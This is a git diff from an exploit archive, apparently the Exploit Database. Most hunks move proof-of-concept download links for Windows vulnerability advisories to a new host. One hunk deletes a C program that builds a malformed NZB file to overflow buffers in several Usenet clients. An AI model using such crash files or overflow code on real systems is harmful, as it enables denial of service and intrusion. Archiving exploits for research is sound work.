-https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/26457.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/26457.zip \ No newline at end of file diff --git a/exploits/windows/dos/26869.txt b/exploits/windows/dos/26869.txt index c9707ab08..580554b16 100644 --- a/exploits/windows/dos/26869.txt +++ b/exploits/windows/dos/26869.txt @@ -8,6 +8,6 @@ This BID will be updated and potentially split into separate records as further UPDATE (Mar 14, 2006): Microsoft has released security advisory MS06-012 addressing this and other issues. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/26869-1.xls +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/26869-1.xls -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/26869-2.xls \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/26869-2.xls \ No newline at end of file diff --git a/exploits/windows/dos/27047.txt b/exploits/windows/dos/27047.txt index 0b4922db9..a1c4535a3 100644 --- a/exploits/windows/dos/27047.txt +++ b/exploits/windows/dos/27047.txt @@ -148,7 +148,7 @@ Advisory CORE-2013-0701 released. [2] http://www.b-e-soft.com/products#artweaver. [3] http://www.coresecurity.com/system/files/attachments/2013/07/CORE-2013-0701-artweaver-poc-28ab190b137f3.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27047.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27047.zip 11. *About CoreLabs* diff --git a/exploits/windows/dos/27049.txt b/exploits/windows/dos/27049.txt index 35f461557..4c7d409c9 100644 --- a/exploits/windows/dos/27049.txt +++ b/exploits/windows/dos/27049.txt @@ -141,7 +141,7 @@ Advisory CORE-2013-0705 released. [2] http://www.xnview.com/en/xnview/. [3] http://www.coresecurity.com/system/files/attachments/2013/07/CORE-2013-0705-xnview-poc-4895a357a242d3c78.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27049.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27049.zip 10. *About CoreLabs* diff --git a/exploits/windows/dos/27050.txt b/exploits/windows/dos/27050.txt index a0ea35909..77e9e7fa6 100644 --- a/exploits/windows/dos/27050.txt +++ b/exploits/windows/dos/27050.txt @@ -51,4 +51,4 @@ http://technet.microsoft.com/en-us/security/bulletin/ms13-056 PoC: https://docs.google.com/file/d/0B48gNjWDSsFwSDQ1ZGZEb3ItSEU -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27050.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27050.zip \ No newline at end of file diff --git a/exploits/windows/dos/27051.txt b/exploits/windows/dos/27051.txt index c1a31a20a..914b5789c 100644 --- a/exploits/windows/dos/27051.txt +++ b/exploits/windows/dos/27051.txt @@ -6,4 +6,4 @@ These problems present themselves when a user views a malicious WMF-formatted fi Reports indicate that these issues lead to a denial-of-service condition. Earlier conjectures that the issues may result in the execution of arbitrary code appear at this point to be incorrect. Attackers could force a crash or restart of the viewing application. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27051.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27051.rar \ No newline at end of file diff --git a/exploits/windows/dos/27055.txt b/exploits/windows/dos/27055.txt index fba7a9774..61b61b2fc 100644 --- a/exploits/windows/dos/27055.txt +++ b/exploits/windows/dos/27055.txt @@ -4,6 +4,6 @@ Microsoft Excel is susceptible to a code-execution vulnerability. The issue pres Attackers may exploit this issue to execute arbitrary machine code in the context of the affected application. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27055-1.xls +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27055-1.xls -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27055-2.xls \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27055-2.xls \ No newline at end of file diff --git a/exploits/windows/dos/27069.txt b/exploits/windows/dos/27069.txt index af06c4b60..6030d43ed 100644 --- a/exploits/windows/dos/27069.txt +++ b/exploits/windows/dos/27069.txt @@ -8,4 +8,4 @@ This issue affects QuickTime 6.5.2 and 7.0.3; other versions may also be vulnera This issue may have previously been discussed in BID 16202 (Apple QuickTime Multiple Code Execution Vulnerabilities). -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27069.jpg \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27069.jpg \ No newline at end of file diff --git a/exploits/windows/dos/27090.c b/exploits/windows/dos/27090.c index 401911c17..d175fc7dc 100644 --- a/exploits/windows/dos/27090.c +++ b/exploits/windows/dos/27090.c @@ -99,4 +99,4 @@ int main(int argc, char **argv) WSACleanup(); return 1; -} +} \ No newline at end of file diff --git a/exploits/windows/dos/27476.txt b/exploits/windows/dos/27476.txt index 79eac449a..263dab329 100644 --- a/exploits/windows/dos/27476.txt +++ b/exploits/windows/dos/27476.txt @@ -4,4 +4,4 @@ Microsoft .NET Framework SDK contains tools for assembling and disassembling MSI These issues were reported to affect the .NET Framework SDK version 1.1 SP1; earlier versions may also be affected. Version 2.0 may also be affected, but code execution does not seem possible. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27476.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27476.zip \ No newline at end of file diff --git a/exploits/windows/dos/27745.txt b/exploits/windows/dos/27745.txt index 748599c96..f2b3bcc85 100644 --- a/exploits/windows/dos/27745.txt +++ b/exploits/windows/dos/27745.txt @@ -6,4 +6,4 @@ This vulnerability may let a malicious website access properties of a site in an This issue was previously reported as an Internet Explorer vulnerability, but the affected component is found to be part of Outlook Express and Windows Mail. Microsoft confirmed that this is an Outlook Express/Windows Mail vulnerability that can also be exploited through Internet Explorer. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27745.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27745.zip \ No newline at end of file diff --git a/exploits/windows/dos/27850.txt b/exploits/windows/dos/27850.txt index 908b98a69..dd102035b 100644 --- a/exploits/windows/dos/27850.txt +++ b/exploits/windows/dos/27850.txt @@ -6,4 +6,4 @@ This vulnerability allows remote attackers to execute arbitrary machine code in Attackers may exploit this issue by coercing users to open malicious CHM or ITS files with Internet Explorer, or when users try to decompile such files using the 'hh -decompile' command. CHM files are considered unsafe files, so there is a possibility that advanced users or security researchers may try to decompile these files to inspect their contents. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27850.chm \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27850.chm \ No newline at end of file diff --git a/exploits/windows/dos/27971.txt b/exploits/windows/dos/27971.txt index d33fd158b..d8e1bfe6a 100644 --- a/exploits/windows/dos/27971.txt +++ b/exploits/windows/dos/27971.txt @@ -6,4 +6,4 @@ An attacker may exploit this issue by enticing a user to visit a malicious site The vendor reports this issue may also be exploited to execute arbitrary code in the context of the victim user. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27971.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27971.zip \ No newline at end of file diff --git a/exploits/windows/dos/28050.txt b/exploits/windows/dos/28050.txt index 2c8621d7f..80375951f 100644 --- a/exploits/windows/dos/28050.txt +++ b/exploits/windows/dos/28050.txt @@ -9,7 +9,7 @@ http://www.oracle.com/technetwork/java/javase/downloads/index.html # Tested on: Windows 7 # CVE : CVE-2013-2470 -PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28050.zip +PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28050.zip CVE-2013-2470 - Java_sun_awt_image_ImagingLib_lookupByteBI heap buffer diff --git a/exploits/windows/dos/28087.txt b/exploits/windows/dos/28087.txt index 36b11f679..ea6166015 100644 --- a/exploits/windows/dos/28087.txt +++ b/exploits/windows/dos/28087.txt @@ -6,4 +6,4 @@ A successful attack may allow attackers to access sensitive information and pote The researcher responsible for discovering this issue has indicated that it presents itself on Windows 2003 SP1, Windows XP Professional Edition SP1 and SP2 running Microsoft Office 2003, and Windows 2000 Professional running Microsoft Office 2003. Other versions may be vulnerable as well. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28087.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28087.zip \ No newline at end of file diff --git a/exploits/windows/dos/28222.txt b/exploits/windows/dos/28222.txt index 443de11bc..60388c87f 100644 --- a/exploits/windows/dos/28222.txt +++ b/exploits/windows/dos/28222.txt @@ -8,4 +8,4 @@ These vulnerabilities allow remote attackers to execute arbitrary machine code i Microsoft Works version 8.0 is vulnerable to these issues; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28222.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28222.zip \ No newline at end of file diff --git a/exploits/windows/dos/28227.txt b/exploits/windows/dos/28227.txt index 1ff2a4897..05c62251a 100644 --- a/exploits/windows/dos/28227.txt +++ b/exploits/windows/dos/28227.txt @@ -6,4 +6,4 @@ This issue occurs when a program calls certain API calls for manipulating Window NOTE: This BID has been revised (July 3, 2007); the issue was originally thought to be a vulnerability in Symantec Norton Personal Firewall, but further investigation reveals a problem in an underlying OS API. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28227.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28227.zip \ No newline at end of file diff --git a/exploits/windows/dos/28343.txt b/exploits/windows/dos/28343.txt index fb2c71035..03c79af65 100644 --- a/exploits/windows/dos/28343.txt +++ b/exploits/windows/dos/28343.txt @@ -4,4 +4,4 @@ Microsoft Internet Explorer is prone to a denial-of-service vulnerability when h Successfully exploiting this issue allows attackers to consume excessive CPU resources in the affected browser and eventually cause Internet Explorer to crash, causing a denial-of-service. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28343.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28343.zip \ No newline at end of file diff --git a/exploits/windows/dos/28381.txt b/exploits/windows/dos/28381.txt index 6bf214af8..55d6e3a3f 100644 --- a/exploits/windows/dos/28381.txt +++ b/exploits/windows/dos/28381.txt @@ -10,4 +10,4 @@ Specific information regarding affected versions of Microsoft Windows is current Update: Since help files can inherently execute arbitrary malicious code, this BID is being retired. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28381.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28381.zip \ No newline at end of file diff --git a/exploits/windows/dos/28469.txt b/exploits/windows/dos/28469.txt index 9296cabba..ef7d6d73d 100644 --- a/exploits/windows/dos/28469.txt +++ b/exploits/windows/dos/28469.txt @@ -6,4 +6,4 @@ This vulnerability allows local attackers to crash affected systems, facilitatin Versions 3.6.cpn, 3.6.cpj, and 3.6.cpiE are vulnerable to this issue; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28469.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28469.zip \ No newline at end of file diff --git a/exploits/windows/dos/28588.txt b/exploits/windows/dos/28588.txt index 8e64a9eba..59c685a9d 100644 --- a/exploits/windows/dos/28588.txt +++ b/exploits/windows/dos/28588.txt @@ -6,4 +6,4 @@ A local authenticated attacker may exploit this issue to crash affected computer Please see the vulnerable systems section for details regarding affected Symantec products. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28588.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28588.zip \ No newline at end of file diff --git a/exploits/windows/dos/28880.txt b/exploits/windows/dos/28880.txt index 0f72fb324..ee42dbbb0 100644 --- a/exploits/windows/dos/28880.txt +++ b/exploits/windows/dos/28880.txt @@ -6,4 +6,4 @@ Successfully exploiting this issue will cause the affected application to crash, Internet Explorer 6 and 7 are vulnerable to this issue; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28880.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28880.zip \ No newline at end of file diff --git a/exploits/windows/dos/28894.txt b/exploits/windows/dos/28894.txt index 8b0a94f6f..861741b52 100644 --- a/exploits/windows/dos/28894.txt +++ b/exploits/windows/dos/28894.txt @@ -6,4 +6,4 @@ Exploiting this issue allows local attackers to crash affected computers, denyin Outpost Firewall PRO 4.0 (964.582.059) is vulnerable to this issue; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28894.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28894.zip \ No newline at end of file diff --git a/exploits/windows/dos/29148.txt b/exploits/windows/dos/29148.txt index 65ebc8fb2..de463e479 100644 --- a/exploits/windows/dos/29148.txt +++ b/exploits/windows/dos/29148.txt @@ -15,4 +15,4 @@ Could not get code execution unfortunately... -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29148.asf \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29148.asf \ No newline at end of file diff --git a/exploits/windows/dos/29172.txt b/exploits/windows/dos/29172.txt index 4821d0192..d02d1d1ef 100644 --- a/exploits/windows/dos/29172.txt +++ b/exploits/windows/dos/29172.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to crash the affected application, denying se This issue affects Microsoft Office 97 for Windows; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29172.asx \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29172.asx \ No newline at end of file diff --git a/exploits/windows/dos/2922.txt b/exploits/windows/dos/2922.txt index ae42ca585..5dc880b61 100644 --- a/exploits/windows/dos/2922.txt +++ b/exploits/windows/dos/2922.txt @@ -27,6 +27,6 @@ bug hugs, disco. -poc: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/2922.doc (12122006-djtest.doc) +poc: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/2922.doc (12122006-djtest.doc) # milw0rm.com [2006-12-12] \ No newline at end of file diff --git a/exploits/windows/dos/29285.txt b/exploits/windows/dos/29285.txt index d17be6cbb..ec5e54e4a 100644 --- a/exploits/windows/dos/29285.txt +++ b/exploits/windows/dos/29285.txt @@ -6,4 +6,4 @@ A remote attacker may exploit this vulnerability by presenting malicious 'WMV', It is not known at this time if this issue can be leveraged to execute arbitrary code; this BID will be updated as further information becomes available. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29285.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29285.zip \ No newline at end of file diff --git a/exploits/windows/dos/29286.txt b/exploits/windows/dos/29286.txt index ccca644ff..c882a5b44 100644 --- a/exploits/windows/dos/29286.txt +++ b/exploits/windows/dos/29286.txt @@ -6,4 +6,4 @@ A remote attacker may exploit this vulnerability by presenting malicious 'WMV', It is not known at this time if this issue can be leveraged to execute arbitrary code; this BID will be updated as further information becomes available. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29286.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29286.zip \ No newline at end of file diff --git a/exploits/windows/dos/29287.txt b/exploits/windows/dos/29287.txt index a39b2ef11..9780287a5 100644 --- a/exploits/windows/dos/29287.txt +++ b/exploits/windows/dos/29287.txt @@ -13,4 +13,4 @@ Filseclab Personal Firewall version 3.0.0.8686 Look 'n' Stop Personal Firewall version 2.05p2 Symantec Sygate Personal Firewall version 5.6.2808 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29287.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29287.zip \ No newline at end of file diff --git a/exploits/windows/dos/29618.c b/exploits/windows/dos/29618.c deleted file mode 100644 index 43e30d1b4..000000000 --- a/exploits/windows/dos/29618.c +++ /dev/null @@ -1,150 +0,0 @@ -// source: https://www.securityfocus.com/bid/22617/info - -News File Grabber is prone to a remote stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer. - -Exploiting this issue allows attackers to execute arbitrary machine code in the context of the affected application. - -This issue affects version 4.1.0.1; other versions may also be affected. - -/*********************************************************************************************\ -* - * -* NZB Generic 0Day DoS Exploit - * -* Proofs of Concept for News File Grabber, NewsBin, Grabit, NewsReactor -and News Rover * -* - * -* - * -* Bugs in News Rover <=12.1 Rev 1: - * -* There's a stack overflow in RoverNZB triggered by files that contains a -long subject. * -* There's a stack overflow in NewsRover triggered by files that contains a -long group. * -* To trigger: run file.nzb - * -* Impact: Code execution on Windows XP, SP1 and SP2 - * -* - * -* Bug in News File Grabber 4.1.0.1: - * -* If the subject field contains a new line, the app will try to exec data in -memory. But * -* since the address changed every time the app runs it's very hard to -exploit. However I * -* sometimes got EIP overwritten by my chars - * -* To trigger: load file.nzb and start download. CPU -> 100% and then Out of -Memory error. * -* Impact: Code execution on Windows XP, SP1 and SP2 - * -* - * -* Bug in Grabit 1.5.3: - * -* Grabit does not correctly handle fields that contains a semicolon. - * -* To trigger: Just grab the file - * -* Impact: DoS - * -* Note: Grabit 1.6 is not affected. - * -* - * -* Bug in NewsReactor: - * -* There's a heap overflow that occurs when group field is too long. - * -* To trigger: load file.nzb, click grab. After a few tries to get the file -it crashes. * -* Impact: Code execution on Windows XP, SP1 and DoS on SP2 - * -* - * -* Bug in NewsBin Pro 4.3.2: - * -* There's a heap overflow that occurs when group field is too long. - * -* To trigger: load file.nzb, and start download. The app should then be -unstable. * -* Impact: Code execution on Windows XP, SP1 and DoS on SP2 - * -* - * -* Bug in NewsBin Pro 5.33 (maybe others...): - * -* There's a heap overflow that occurs when group field is too long. - * -* To trigger: load file.nzb, and start download. Then click "Delete All -Posts". Boom! * -* Impact: Code execution on Windows XP, SP1 and DoS on SP2 - * -* Note: Maybe it's possible to exec code on SP2, but there is a lot of bad -chars and with the * -* stack protection I didn't find a way to jump to a good return address. - * -* - * -* Solution: Buy your dvds leecha!!! - * -* - * -* - * -* Coded and discovered by Marsu <MarsupilamiPowa@hotmail.fr> - * -* Note: thx aux Bananas et a la KryptonIT. Bon courage aux inuITs :P - * -\*********************************************************************************************/ - -#include "stdlib.h" -#include "stdio.h" -#include "string.h" - -char nzbheader[]="<?xml version=\"1.0\" encoding=\"iso-8859-1\" ?>\n" - "<!DOCTYPE nzb PUBLIC \"-//newzBin//DTD NZB 1.0//EN\" -\"http://www.newzbin.com/DTD/nzb/nzb-1.0.dtd\">\n" - "<!-- NZB Generated by MarsupilamiPowa -->\n" - "<nzb xmlns=\"MarsupilamiPowa@hotmail.fr\">\n\n"; - - -char nzbend[]="</segment>\n" - "</segments>\n" - "</file>\n" - "</nzb>\n"; - - - -int main(int argc, char* argv[]) { - -FILE *file; -char * pad; - -printf("MarsupilamiPowa's Generic NZB DoS Exploit\n"); - -file=fopen("file.nzb","wb"); - -fprintf(file,nzbheader); -fprintf(file,"<file poster=\"Marsu\n"); -fprintf(file,"\" date=\"1170609233\"\nsubject=\"hello bug"); -fprintf(file,"\">\n"); -fprintf(file,"<groups><group>"); - -pad = (char*)malloc(sizeof(char)*3000); -memset(pad,'A',3000); -fprintf(file,pad); -fprintf(file,"</group></groups>\n<segments>\n<segment bytes=\"30\" -number=\"1\">"); -fprintf(file,"\n;\n"); -fprintf(file,nzbend); -fclose(file); - -printf("file.nzb generated! Have fun\n"); -return 0; - -} - diff --git a/exploits/windows/dos/29660.txt b/exploits/windows/dos/29660.txt index f19373ccb..198db1247 100644 --- a/exploits/windows/dos/29660.txt +++ b/exploits/windows/dos/29660.txt @@ -8,4 +8,4 @@ Microsoft Office 2003 is vulnerable to this issue; other versions may also be af Note: IrfanView version 3.99 is also vulnerable to this issue. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29660.wmf \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29660.wmf \ No newline at end of file diff --git a/exploits/windows/dos/29664.txt b/exploits/windows/dos/29664.txt index bf176b94d..f3875c52a 100644 --- a/exploits/windows/dos/29664.txt +++ b/exploits/windows/dos/29664.txt @@ -6,4 +6,4 @@ Successfully exploiting this issue allows remote attackers to crash the affected Microsoft Office Publisher 2007 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29664.pub \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29664.pub \ No newline at end of file diff --git a/exploits/windows/dos/29707.txt b/exploits/windows/dos/29707.txt index 7751cb161..cd6b37ebc 100644 --- a/exploits/windows/dos/29707.txt +++ b/exploits/windows/dos/29707.txt @@ -13,4 +13,4 @@ image(width or height smaller than 65535 ) which could lead to code exec. The file that causes the AV is attached: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29707.gif \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29707.gif \ No newline at end of file diff --git a/exploits/windows/dos/29738.txt b/exploits/windows/dos/29738.txt index f06f09902..48c4ee9fd 100644 --- a/exploits/windows/dos/29738.txt +++ b/exploits/windows/dos/29738.txt @@ -6,4 +6,4 @@ A remote attacker may exploit this vulnerability by presenting a malicious WAV f Successful exploits will result in excessive CPU consumption, effectively denying service. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29738.wav \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29738.wav \ No newline at end of file diff --git a/exploits/windows/dos/29743.txt b/exploits/windows/dos/29743.txt index dc0b0e22b..ba3cc4098 100644 --- a/exploits/windows/dos/29743.txt +++ b/exploits/windows/dos/29743.txt @@ -6,4 +6,4 @@ A local authenticated attacker may exploit this issue to crash affected computer This issue is similar to the one described in BID 22961. Symantec is currently investigating this issue; we will update this BID as more information emerges. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29743.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29743.zip \ No newline at end of file diff --git a/exploits/windows/dos/30160.txt b/exploits/windows/dos/30160.txt index 2c6c48d9a..21d904188 100644 --- a/exploits/windows/dos/30160.txt +++ b/exploits/windows/dos/30160.txt @@ -6,4 +6,4 @@ An attacker may exploit this issue by enticing victims into opening a malicious Successful exploits will result in denial-of-service conditions on applications using the affected library. Applications such as Windows Explorer or Picture and Fax viewer have been identified as vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30160.ico.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30160.ico.zip \ No newline at end of file diff --git a/exploits/windows/dos/30208.txt b/exploits/windows/dos/30208.txt index 151345e1b..1959a2553 100644 --- a/exploits/windows/dos/30208.txt +++ b/exploits/windows/dos/30208.txt @@ -3,7 +3,7 @@ http://corelabs.coresecurity.com/ IcoFX Buffer Overflow Vulnerability -PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30208.zip +PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30208.zip 1. *Advisory Information* diff --git a/exploits/windows/dos/30255.txt b/exploits/windows/dos/30255.txt index 275663329..fe6b76b19 100644 --- a/exploits/windows/dos/30255.txt +++ b/exploits/windows/dos/30255.txt @@ -6,4 +6,4 @@ An attacker may exploit this issue to execute arbitrary code with the privileges PC SOFT WinDEV 11 is reported vulnerable; other versions and related products (WinDEV Express, Mobile, and WebDEV) may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30255.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30255.zip \ No newline at end of file diff --git a/exploits/windows/dos/30462.py b/exploits/windows/dos/30462.py index 9f3accd00..338f5c7e7 100755 --- a/exploits/windows/dos/30462.py +++ b/exploits/windows/dos/30462.py @@ -68,5 +68,5 @@ print "[x] File successfully written." f.close() print "[x] Open iapetus.au with Windows Media Player 11." -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30462-1.au -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30462-2.py \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30462-1.au +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30462-2.py \ No newline at end of file diff --git a/exploits/windows/dos/30500.txt b/exploits/windows/dos/30500.txt index 4c9f0f382..60855db95 100644 --- a/exploits/windows/dos/30500.txt +++ b/exploits/windows/dos/30500.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to crash the affected application, denying se This issue affects Yahoo! Messenger 8.1.0; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30500.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30500.rar \ No newline at end of file diff --git a/exploits/windows/dos/30512.txt b/exploits/windows/dos/30512.txt index efbc6758a..8e1c9c89a 100644 --- a/exploits/windows/dos/30512.txt +++ b/exploits/windows/dos/30512.txt @@ -6,4 +6,4 @@ Successfully exploiting these issues allows remote attackers to crash the affect FileInfo 2.09 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30512.exe \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30512.exe \ No newline at end of file diff --git a/exploits/windows/dos/30544.txt b/exploits/windows/dos/30544.txt index ebc73c693..aa9ea97fc 100644 --- a/exploits/windows/dos/30544.txt +++ b/exploits/windows/dos/30544.txt @@ -8,4 +8,4 @@ NOTE: This issue is reportedly caused by a buffer-overflow issue, but this has n Yahoo! Messenger 8.1.0.209 and 8.1.0.402 are vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30544.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30544.rar \ No newline at end of file diff --git a/exploits/windows/dos/30590.txt b/exploits/windows/dos/30590.txt index 898d1d053..915ff815d 100644 --- a/exploits/windows/dos/30590.txt +++ b/exploits/windows/dos/30590.txt @@ -6,4 +6,4 @@ Attackers can exploit these issues to cause a denial of service or to write mali WinImage 8.0 and 8.10 are vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30590.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30590.zip \ No newline at end of file diff --git a/exploits/windows/dos/30619.txt b/exploits/windows/dos/30619.txt index 6fc322096..d4fb659a6 100644 --- a/exploits/windows/dos/30619.txt +++ b/exploits/windows/dos/30619.txt @@ -4,4 +4,4 @@ Microsoft Windows Explorer is prone to a denial-of-service vulnerability because Attackers can exploit this issue to cause Windows Explorer to exhaust CPU cycles and become unresponsive. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30619.png \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30619.png \ No newline at end of file diff --git a/exploits/windows/dos/30672.txt b/exploits/windows/dos/30672.txt index 9cbc62de4..29b2d330d 100644 --- a/exploits/windows/dos/30672.txt +++ b/exploits/windows/dos/30672.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to execute arbitrary code with the privileges UPDATE (December 24, 2007): The recently released Y patch does not address this issue. Please see the references for more information. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30672.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30672.zip \ No newline at end of file diff --git a/exploits/windows/dos/30934.txt b/exploits/windows/dos/30934.txt index c2a3b728e..71e9b8a04 100644 --- a/exploits/windows/dos/30934.txt +++ b/exploits/windows/dos/30934.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to crash the application. Given the nature of This issue is reported to affect Total Player 3.0; other versions may also be vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30934.m3u \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30934.m3u \ No newline at end of file diff --git a/exploits/windows/dos/31122.txt b/exploits/windows/dos/31122.txt index 6b6169634..e4784929f 100644 --- a/exploits/windows/dos/31122.txt +++ b/exploits/windows/dos/31122.txt @@ -6,4 +6,4 @@ 